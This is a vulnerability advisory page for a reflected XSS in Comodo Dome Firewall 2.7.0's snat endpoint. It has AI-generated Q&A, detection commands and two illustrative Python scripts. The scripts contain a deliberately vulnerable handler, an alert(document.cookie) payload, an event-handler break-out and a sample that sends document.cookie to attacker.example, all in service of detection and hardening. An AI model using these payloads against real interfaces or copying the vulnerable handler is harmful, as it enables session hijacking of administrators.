CVE-2019-25420
Reflected XSS in Comodo Dome Firewall 2.7.0 via snat Endpoint
Publication date: 2026-02-19
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| comodo | dome_firewall | up to and including 2.7.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2019-25420 is a reflected cross-site scripting (XSS) vulnerability in Comodo Dome Firewall version 2.7.0 and earlier.

The firewall's web interface does not neutralize user-supplied input when it generates the page (CWE-79), so an attacker can get JavaScript written into the HTML that the interface returns.

The attack is a crafted POST request to the 'snat' endpoint with the script placed in the 'port' or 'snat_to_ip' parameter, neither of which should ever legitimately contain anything but a port number or an IP address.

Because the XSS is reflected rather than stored, the victim (typically an administrator who is logged in to the firewall interface) has to be induced to submit the crafted request. The injected script then runs in the victim's browser in the origin of the management interface, where it can act with that session's privileges and read or change what the session can. [1]
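The pattern described above, as an added Python illustration that is not Comodo's code (the product's real implementation is not public here): a handler that echoes the 'port' and 'snat_to_ip' form values back into the page verbatim, beside a hardened version that rejects anything that is not a port number or an IPv4 address and HTML-escapes what it reflects. The form layout, the constructed SAMPLE_BODY payload and all function names are assumptions.

```python
import html
import ipaddress
from urllib.parse import parse_qs

# Constructed POST body (not captured traffic): the two parameters named in the
# advisory, with a script payload URL-encoded into snat_to_ip.
SAMPLE_BODY = "port=8080&snat_to_ip=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_snat_vulnerable(form: dict) -> str:
    """CWE-79: the submitted values are written back into the page verbatim,
    so a value containing markup ends the attribute and becomes live script."""
    return (
        "<form method='POST' action='/snat'>"
        f"<input name='port' value='{form.get('port', '')}'>"
        f"<input name='snat_to_ip' value='{form.get('snat_to_ip', '')}'>"
        "</form>"
    )


def validate_port(value: str) -> int:
    """Accept only an integer in 1..65535; int() raises ValueError otherwise."""
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def validate_ipv4(value: str) -> str:
    """Accept only a dotted-quad IPv4 address (AddressValueError is a ValueError)."""
    return str(ipaddress.IPv4Address(value))


def render_snat_hardened(form: dict) -> str:
    """Validate first (a port number and an IPv4 address cannot carry markup),
    reflect the normalized value rather than the raw input, and HTML-escape
    whatever is reflected so nothing can close the attribute."""
    errors = []
    port = ip = ""
    try:
        port = str(validate_port(form.get("port", "")))
    except ValueError:
        errors.append("port")
    try:
        ip = validate_ipv4(form.get("snat_to_ip", ""))
    except ValueError:
        errors.append("snat_to_ip")
    # quote=True also escapes ' and ", which matters inside value='...'
    page = (
        "<form method='POST' action='/snat'>"
        f"<input name='port' value='{html.escape(port, quote=True)}'>"
        f"<input name='snat_to_ip' value='{html.escape(ip, quote=True)}'>"
        "</form>"
    )
    if errors:
        # The rejected field names are fixed strings, but escape by habit anyway.
        page += f"<p>invalid: {html.escape(', '.join(errors))}</p>"
    return page


if __name__ == "__main__":
    form = parse_form(SAMPLE_BODY)
    print(render_snat_vulnerable(form))  # payload lands in the page as markup
    print(render_snat_hardened(form))    # snat_to_ip rejected, nothing reflected raw
```

Validation does the real work here: once the value has to be an integer or an IPv4 address, there is nothing left for an attacker to inject, and the escaping is defence in depth for whatever else the page reflects.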
How can this vulnerability impact me?
An attacker can execute arbitrary script in the browser of a user who submits the crafted request to the affected endpoint.
That script runs in the origin of the firewall's management interface, so it can steal sensitive information, hijack the session, or perform actions on behalf of the user, including changes to the firewall configuration that the user is allowed to make.
Because the XSS is reflected, exploitation requires user interaction (the victim must send the crafted request), so it is typically delivered through targeted phishing or social engineering aimed at firewall administrators.
Overall it poses a medium severity risk that can compromise user security and trust in the affected system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Exploitation attempts show up as POST requests to the "snat" endpoint of the Comodo Dome Firewall web interface whose "port" or "snat_to_ip" parameter carries a script payload instead of a port number or an IPv4 address. Because both parameters have a narrow expected format, the most reliable check is to flag any value that does not match that format rather than to search only for `<script`; payloads are commonly URL-encoded (`%3Cscript%3E`) or use event handlers (`onerror=`, `onfocus=`) without any script tag, so decode the parameters before matching.

Where to look:

- Packet capture, if the interface is served over plain HTTP: `tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep 'POST /snat'`. The BPF expression keeps only TCP segments that carry data. If the management interface is served over TLS, as management interfaces usually are, tcpdump will not show the request body; use a TLS-terminating proxy, a full-request audit log, or the device's own logs instead.
- Web server logs: `grep 'POST /snat' /var/log/httpd/access_log | grep -iE 'port=|snat_to_ip='`. A standard access log records the request line, not the POST body, so this only matches parameters that appear in the query string; body parameters are visible only where a module or proxy logs request bodies.
- Active testing: use a proxy tool such as Burp Suite to send a POST to the snat endpoint with a harmless marker string in `port` and `snat_to_ip` and check whether the response reflects it unencoded. [1]
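The detection logic from the list above as an added Python example, not part of the original page: it runs over a few constructed request captures (not real Comodo traffic) of the kind a TLS-terminating proxy or full-request audit log would deliver, flags any request to /snat whose 'port' or 'snat_to_ip' value does not have the shape the field expects, and labels whether a script indicator is present. CAPTURED_REQUESTS, the hostname fw.example.internal and all function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request captures (not real Comodo traffic), in the form a
# TLS-terminating proxy or a full-request audit log would deliver. A plain
# access log does not record POST bodies, so it cannot be the input here.
CAPTURED_REQUESTS = [
    # 1. benign configuration change
    "POST /snat HTTP/1.1\r\nHost: fw.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "port=8080&snat_to_ip=192.0.2.10",
    # 2. URL-encoded <script> in snat_to_ip
    "POST /snat HTTP/1.1\r\nHost: fw.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "port=80&snat_to_ip=%3Cscript%3Efetch('//attacker.example/?c='%2Bdocument.cookie)%3C/script%3E",
    # 3. attribute break-out with an event handler in port (no <script> tag at all)
    "POST /snat HTTP/1.1\r\nHost: fw.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "port=%22%20autofocus%20onfocus%3Dalert(1)%20x%3D%22&snat_to_ip=192.0.2.10",
    # 4. GET with a well-formed query-string parameter
    "GET /snat?port=443 HTTP/1.1\r\nHost: fw.example.internal\r\n\r\n",
]

# Used only to label a finding; the decision to flag rests on the format check.
SCRIPT_INDICATORS = re.compile(r"<\s*script|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, decoded parameters).
    Query-string and body parameters are merged: the advisory names POST, but
    the same check costs nothing on the query string."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for source in (parts.query, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params[name] = values[0]  # percent-decoding happens here
    return method, parts.path, params


def looks_like_port(value: str) -> bool:
    # isascii() guards against Unicode digits that isdigit() accepts but int() rejects
    return value.isascii() and value.isdigit() and 1 <= int(value) <= 65535


def looks_like_ipv4(value: str) -> bool:
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def inspect_request(raw: str) -> list:
    """One finding per snat parameter whose value is not what the field expects."""
    method, path, params = parse_request(raw)
    if path != "/snat":
        return []
    findings = []
    for name, check in (("port", looks_like_port), ("snat_to_ip", looks_like_ipv4)):
        value = params.get(name)
        if value is None or check(value):
            continue
        reason = "script indicator" if SCRIPT_INDICATORS.search(value) else "unexpected format"
        findings.append({"method": method, "param": name, "value": value, "reason": reason})
    return findings


def scan(requests) -> list:
    """(index, finding) pairs over a batch of captured requests."""
    return [(i, f) for i, raw in enumerate(requests) for f in inspect_request(raw)]


if __name__ == "__main__":
    for i, finding in scan(CAPTURED_REQUESTS):
        print(f"request {i + 1}: {finding['param']} ({finding['reason']}): {finding['value']!r}")
```

Request 3 is the case a `grep -i '<script'` misses: the payload breaks out of the attribute with a quote and an event handler, which the format check still catches because the value is not a port number.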
What immediate steps should I take to mitigate this vulnerability?
The root-cause fix belongs in the product: the snat page must validate the "port" and "snat_to_ip" values (a port number and an IP address respectively) and HTML-encode whatever it reflects. That is a vendor change, so apply any patch or update from Comodo that addresses this vulnerability; versions up to and including 2.7.0 are affected.

Until the fix is applied:

- Restrict access to the Comodo Dome Firewall web interface to trusted administrator networks, so the attacker cannot reach the endpoint directly and a victim's browser can only reach it from where exploitation would be noticed.
- Monitor POST requests to the snat endpoint and, where a proxy or WAF sits in front of the interface, block requests whose "port" or "snat_to_ip" parameter does not look like a port number or an IP address.
- Remind administrators not to follow links into the firewall interface from untrusted sources; a reflected XSS only works when the victim issues the crafted request. [1]